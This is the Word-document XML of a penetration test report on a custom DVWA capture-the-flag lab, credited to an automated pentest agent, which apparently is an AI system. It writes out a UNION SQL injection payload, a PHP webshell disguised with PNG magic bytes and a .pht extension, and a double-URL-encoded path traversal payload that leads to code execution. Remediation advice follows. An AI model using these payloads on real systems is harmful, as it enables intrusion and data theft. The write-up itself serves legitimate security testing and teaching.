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Penetration Test Report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Target: http://100.113.75.28:8081/  |  DVWA Custom Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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Date: 2026-03-06  |  Tester: Automated Pentest Agent  |  Status: FLAG CAPTURED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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A penetration test was conducted against a custom Damn Vulnerable Web Application (DVWA) instance running on Apache 2.4.65 / PHP 8.5.0. The objective was to locate and retrieve a hidden flag stored within the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The engagement was successful. The flag was retrieved via a chained exploit combining a flawed file upload filter bypass (uploading a PHP webshell with a .pht extension and forged PNG magic bytes) with a Local File Inclusion (LFI) vulnerability that used double URL-encoding to bypass a path traversal filter. Remote Code Execution was achieved as www-data, and the flag was found at /foothold/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG CAPTURED: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="048A81"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG{INITIAL_FOOTHOLD_ACHIEVED}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target IP: 100.113.75.28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target Port: 8081</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application: DVWA (custom security level)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Out of scope: .git / .svn source access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The test followed a phase-based approach:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1 — Reconnaissance &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2 — Exploitation (File Upload Bypass + LFI + RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3 — Post-Exploitation (Flag Retrieval)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Reconnaissance &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Port &amp; Service Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Nmap scan revealed a single open port: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8081/tcp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Apache/2.4.65 (Debian)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PHP 8.5.0 | Cookie: security=custom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Key Findings from Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">robots.txt revealed /admin/, /backup/, /debug/ (all returned 404 — decoys)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exposed php.ini: allow_url_include=on, allow_url_fopen=on (RFI enabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gobuster found: setup.php, instructions.php, security.txt, php.ini, config/, database/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVWA security level: custom (non-standard, each module has custom PHP source)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default credentials admin/password accepted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLi module source exposed via /vulnerabilities/view_source.php — revealed a hidden backdoor (role=admin disables WAF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Top Vulnerability Hypotheses (Phase 1 Checkpoint)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500"/>
        <w:gridCol w:w="4560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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 + Hidden Backdoor (role=admin)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code showed role=admin bypasses WAF; direct string interpolation in query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Remote File Inclusion (RFI)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php.ini: allow_url_include=on confirmed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Upload + LFI Chain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allows .pht; LFI strips ../ but decodes AFTER; double-encode bypass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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 SQLi Backdoor — Database Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The custom SQLi module contained a hardcoded backdoor: passing role=admin set $skip_filter=true, completely bypassing the WAF. Combined with debug=1, full query visibility was achieved. UNION-based injection was used to enumerate all tables and columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">SQL Injection payload used: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 /vulnerabilities/sqli/?id=0'+UNION+SELECT+table_name,2,3,4+FROM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information_schema.tables+WHERE+table_schema=database()--+-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&amp;role=admin&amp;debug=1&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tables found: access_log, guestbook, security_log, users. No flag column was present in the database. LOAD_FILE() was unavailable (insufficient DB privilege).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 File Upload Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The upload module (custom.php) implemented multiple flawed validation checks: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Flaw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Bypass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MIME type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checks client-supplied Content-Type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image/png in multipart form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Magic byte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Checks offset 1-3 for 'PNG' instead of 0-3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Prepend \x00PNG to PHP payload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Extension filter (regex)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/ph(ar|p|tml|p[1-9])/i — does not match 'pht'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.pht extension (Apache executes as PHP)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 revalidation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applied to .png files, not .pht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Bypassed by extension mismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Webshell payload uploaded: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\x00PNG\r\n\x1a\n&lt;?php echo '###' . shell_exec($_GET['c'] . ' 2&gt;&amp;1') . '###'; ?&gt;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Filename: img_shell.pht  |  MIME: image/png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Uploaded to: hackable/uploads/custom_d78aa.../img_2b8e0aaa48.pht</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 LFI Bypass — Double URL Encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The File Inclusion module (custom.php) attempted to block path traversal by calling str_replace('../', '', $file) BEFORE calling urldecode(). This order-of-operations flaw allowed bypass via double URL-encoding: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Step 1 — Normal:    ../../hackable/...  → stripped to hackable/... (blocked)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Step 2 — Encoded:   ..%2F..%2Fhackable  → not matched by str_replace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After urldecode: ../../hackable  → TRAVERSAL SUCCEEDS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Step 3 — But Apache re-decodes %2F, so double-encode required: ..%252F..%252F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Final LFI payload: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 /vulnerabilities/fi/?page=..%252F..%252Fhackable%252Fuploads%252F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custom_d78aa...%252Fimg_2b8e0aaa48.pht&amp;c=id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RCE verified: uid=33(www-data) gid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Post-Exploitation &amp; Flag Retrieval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Filesystem Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">With RCE established, a PHP script was written to /tmp via the webshell and executed to search the filesystem for FLAG{} patterns. Standard shell tools (cat, grep, sed, find) were restricted, but php binary was available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Search scope: /, /var/www, /tmp, /home, /root, /etc, /foothold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Flag Location</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag file found: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">/foothold/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag value: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="048A81"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG{INITIAL_FOOTHOLD_ACHIEVED}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Retrieval command (via webshell through LFI):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php -r "echo file_get_contents('/foothold/flag.txt');"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Attack Chain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160"/>
        <w:gridCol w:w="3200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Reconnaissance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Nmap, Gobuster, source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Identified custom DVWA, exposed php.ini, found SQLi backdoor in source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credentials (admin/password)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to DVWA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Enumeration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 + role=admin WAF bypass + UNION SELECT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Enumerated all tables; no flag in DB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Webshell Upload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Magic byte forge + .pht ext + image/png MIME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PHP webshell uploaded to hackable/uploads/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LFI Bypass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URL-encoding (%252F) to bypass str_replace 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Shell executed via PHP include()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Shell commands via ?c= parameter through LFI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execution as www-data confirmed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Retrieval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PHP file_get_contents('/foothold/flag.txt')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FLAG{INITIAL_FOOTHOLD_ACHIEVED}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Vulnerabilities &amp; Recommendations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80"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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 SQLi Backdoor (role=admin)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Intentional backdoor in custom.php disabling WAF when role=admin is passed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backdoor; use parameterized queries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Credentials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admin/password accepted on login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 strong password policy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Exposed php.ini &amp; Source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php.ini and view_source.php accessible without auth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 access; disable dangerous PHP settings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Upload — Magic Byte Flaw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substr($bytes, 1, 3) checks offset 1 instead of 0; only MIME from client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imagecreatefromstring() for all uploads; server-side MIME detection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Upload — Extension Whitelist Missing .pht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 /ph(ar|p|tml|p[1-9])/i misses .pht, .shtml, .cgi etc.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strict whitelist (jpg, png, gif only); store outside webroot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LFI — Double URL-Encoding Bypass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str_replace('../') runs BEFORE urldecode() — encoded traversal bypasses filter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realpath() + whitelist of allowed include files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Sensitive File Exposure (/foothold/flag.txt)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Sensitive file readable by www-data process outside webroot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 file permissions; use dedicated secret storage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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The engagement successfully demonstrated a full attack chain from unauthenticated reconnaissance to RCE and flag retrieval on a custom DVWA instance. The critical path exploited was a combination of a flawed file upload validator (incorrect magic byte offset, missing .pht from extension blacklist) chained with a path traversal filter that applied str_replace before urldecode, making double URL-encoding an effective bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The flag FLAG{INITIAL_FOOTHOLD_ACHIEVED} was retrieved from /foothold/flag.txt by a PHP webshell executed under the www-data user context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="048A81"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG{INITIAL_FOOTHOLD_ACHIEVED}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4C6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2026-03-06T15:24:52.423Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-06T15:24:52.424Z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